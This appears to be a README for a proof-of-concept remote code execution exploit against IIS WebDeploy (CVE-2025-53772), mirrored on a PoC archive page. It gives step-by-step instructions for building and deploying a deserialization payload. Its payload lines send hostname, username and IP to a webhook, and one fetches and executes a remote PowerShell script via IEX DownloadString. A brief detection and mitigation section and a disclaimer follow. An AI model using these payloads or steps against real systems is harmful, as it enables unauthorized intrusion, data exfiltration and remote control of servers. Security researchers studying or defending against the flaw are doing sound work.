关联漏洞
介绍
# CVE-2025-53772 - IIS WebDeploy RCE Exploit
This repository contains a Proof-of-Concept (PoC) exploit for CVE-2025-53772, a Remote Code Execution vulnerability in IIS WebDeploy through unsafe deserialization.
## ⚠️ Disclaimer
This tool is for educational and authorized security testing purposes only. The author is not responsible for any misuse or damage caused by this software. Only use on systems you own or have explicit permission to test.
## 🔧 Quick Setup
### 1. Customize the Payload
Edit the payload in poc.cs at lines 18-19 to specify your target action:
csharp// Replace with your webhook URL and desired payload
```
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/YOUR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
```
### 📋 Payload Examples
Information Gathering (Recommended):
```
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/YOUR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
```
Simple Command Execution:
```
csharpset.Add("cmd.exe");
set.Add("/c calc.exe"); // Opens calculator
```
Reverse Shell (Advanced):
```
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://YOUR-SERVER/shell.ps1')\"");
```
### 2. Generate the Exploit Payload
The GitHub Action will automatically compile the PoC and generate the Base64-encoded payload:
Push your changes to trigger the GitHub Action
Navigate to Actions tab in your repository
Click on the latest workflow run
Find the generated payload in the console output:
<img width="1565" height="623" alt="GitHub Actions payload output" src="https://github.com/user-attachments/assets/512a6037-0ab6-4f1c-b02b-364996c315ee" />
3. Deploy the Exploit
Use the generated Base64 payload against the vulnerable IIS WebDeploy endpoint:
<img width="856" height="255" alt="Payload deployment example" src="https://github.com/user-attachments/assets/88b147cd-fae7-4034-9622-5af3a39b2bec" />
🎯 Vulnerability Details
# CVE ID: CVE-2025-53772
Affected Software: IIS WebDeploy (multiple versions)
Vulnerability Type: Unsafe Deserialization leading to RCE
Attack Vector: Remote, unauthenticated
Severity: Critical
## 🛠️ Manual Compilation (Optional)
If you prefer to compile locally instead of using GitHub Actions:
bash# Windows with .NET Framework
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs
poc.exe > payload.txt
## Or with Visual Studio
csc poc.cs
poc.exe
📡 Setting Up a Webhook
Go to webhook.site to get a free webhook URL
Replace YOUR-WEBHOOK-ID in the payload with your unique ID
Monitor incoming requests to see exploit execution results
## 🔍 Detection & Mitigation
Detection:
Monitor for unusual BinaryFormatter deserialization activities
Look for suspicious process spawning from IIS worker processes
Network monitoring for unexpected outbound connections
Mitigation:
Update IIS WebDeploy to the latest patched version
Implement input validation and sanitization
Use allowlists for deserialization types
Deploy network segmentation and monitoring
## 📚 References
CVE-2025-53772 Details
Microsoft Security Advisory
NIST Vulnerability Database
文件快照
[4.0K] /data/pocs/3c2a381f462064ff1d0f294e64cd766d57b9d13d
├── [2.0K] poc.cs
└── [3.6K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。